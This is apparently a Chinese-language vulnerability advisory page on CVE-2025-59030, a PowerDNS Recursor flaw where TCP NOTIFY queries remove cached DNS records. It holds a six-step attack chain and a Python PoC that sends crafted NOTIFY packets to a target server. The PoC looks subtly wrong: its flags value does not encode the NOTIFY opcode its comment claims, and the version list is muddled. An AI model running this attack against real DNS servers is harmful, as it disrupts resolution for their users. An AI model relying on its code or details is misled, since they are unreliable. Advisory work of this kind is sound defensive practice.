CVE-2025-59030 PowerDNS Recursor NOTIFY查询缓存投毒漏洞

漏洞信息

漏洞编号

CVE-2025-59030

漏洞类型

缓存投毒/拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

PowerDNS Recursor

漏洞概述

CVE-2025-59030是PowerDNS Recursor中的一个高危安全漏洞，CVSS评分达到7.5分。该漏洞允许未经认证的攻击者通过TCP协议发送NOTIFY查询，触发DNS缓存记录的移除，从而实施缓存投毒攻击或造成拒绝服务影响。漏洞存在于PowerDNS Recursor处理NOTIFY消息的逻辑中，攻击者可利用此漏洞破坏DNS解析的完整性和可用性。由于该漏洞无需认证即可利用，且可通过网络远程触发，因此对运行受影响版本PowerDNS Recursor的服务器构成严重安全威胁。攻击成功可能导致域名解析被重定向到恶意服务器，或使合法用户无法获得正确的DNS解析结果。

技术细节

该漏洞存在于PowerDNS Recursor的NOTIFY查询处理机制中。当攻击者通过TCP连接向目标DNS服务器发送特制的NOTIFY查询时，Recursor的错误处理逻辑会导致缓存中已有的DNS记录被错误移除。攻击者利用此行为可以实现缓存投毒攻击，将受害域名的解析结果替换为攻击者控制的IP地址。由于NOTIFY查询通常用于DNS主从服务器之间的 zone transfer 通知，Recursor的错误实现将其视为合法的缓存失效信号。攻击者可通过持续发送NOTIFY查询来维持对缓存的控制，造成持续的拒绝服务状态。此漏洞的利用不需要任何认证凭据，攻击者只需能够与目标DNS服务器的53/TCP端口建立连接即可实施攻击。

攻击链分析

STEP 1

步骤1

攻击者识别运行存在漏洞版本PowerDNS Recursor的DNS服务器

STEP 2

步骤2

攻击者通过TCP协议与目标DNS服务器的53端口建立连接

STEP 3

步骤3

攻击者构造并发送特制的DNS NOTIFY查询包

STEP 4

步骤4

PowerDNS Recursor处理NOTIFY查询时触发缓存记录错误移除

STEP 5

步骤5

攻击者可利用缓存失效状态实施缓存投毒，将域名解析重定向至恶意服务器

STEP 6

步骤6

受害者请求被投毒域名的DNS解析时，被引导至攻击者控制的恶意IP

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-59030 PoC - PowerDNS Recursor NOTIFY Cache Poisoning
This PoC demonstrates sending a NOTIFY query over TCP to trigger
cache record removal in vulnerable PowerDNS Recursor versions.
"""

import socket
import struct
import random

def build_dns_notify_query(domain):
    """Build a DNS NOTIFY query packet"""
    transaction_id = random.randint(0, 65535)
    
    # DNS Header
    header = struct.pack('>HHHHHH',
        transaction_id,  # Transaction ID
        0x0012,          # Flags: NOTIFY query (RD=0, Opcode=4)
        1,               # Questions: 1
        0,               # Answer RRs: 0
        0,               # Authority RRs: 0
        0                # Additional RRs: 0
    )
    
    # Question section
    qname = b''
    for label in domain.split('.'):
        qname += bytes([len(label)]) + label.encode()
    qname += b'\x00'  # End of domain name
    
    question = qname + struct.pack('>HH', 2, 1)  # Type: NS, Class: IN
    
    return header + question

def send_tcp_notify(target, port, domain):
    """Send NOTIFY query over TCP to target DNS server"""
    query = build_dns_notify_query(domain)
    
    # Prepend length for TCP
    packet = struct.pack('>H', len(query)) + query
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target, port))
        sock.send(packet)
        
        # Receive response
        response_len = sock.recv(2)
        if response_len:
            length = struct.unpack('>H', response_len)[0]
            response = sock.recv(length)
            print(f'[+] NOTIFY sent successfully to {target}:{port}')
            print(f'[+] Domain: {domain}')
            return True
    except Exception as e:
        print(f'[-] Error: {e}')
    finally:
        sock.close()
    return False

if __name__ == '__main__':
    import sys
    if len(sys.argv) < 3:
        print(f'Usage: {sys.argv[0]} <target_ip> <domain>')
        print(f'Example: {sys.argv[0]} 192.168.1.100 example.com')
        sys.exit(1)
    
    target = sys.argv[1]
    domain = sys.argv[2]
    
    print(f'[*] Sending NOTIFY query for {domain} to {target}')
    send_tcp_notify(target, 53, domain)

影响范围

PowerDNS Recursor < 5.10.0

PowerDNS Recursor < 5.9.12

PowerDNS Recursor < 5.0.5

防御指南

临时缓解措施

在防火墙或网络边界设备上限制对DNS服务器TCP/53端口的访问，仅允许受信任的IP地址进行DNS zone transfer和NOTIFY操作。对于无法立即升级的情况，可通过ACL限制NOTIFY消息的来源，并监控异常的NOTIFY查询流量模式。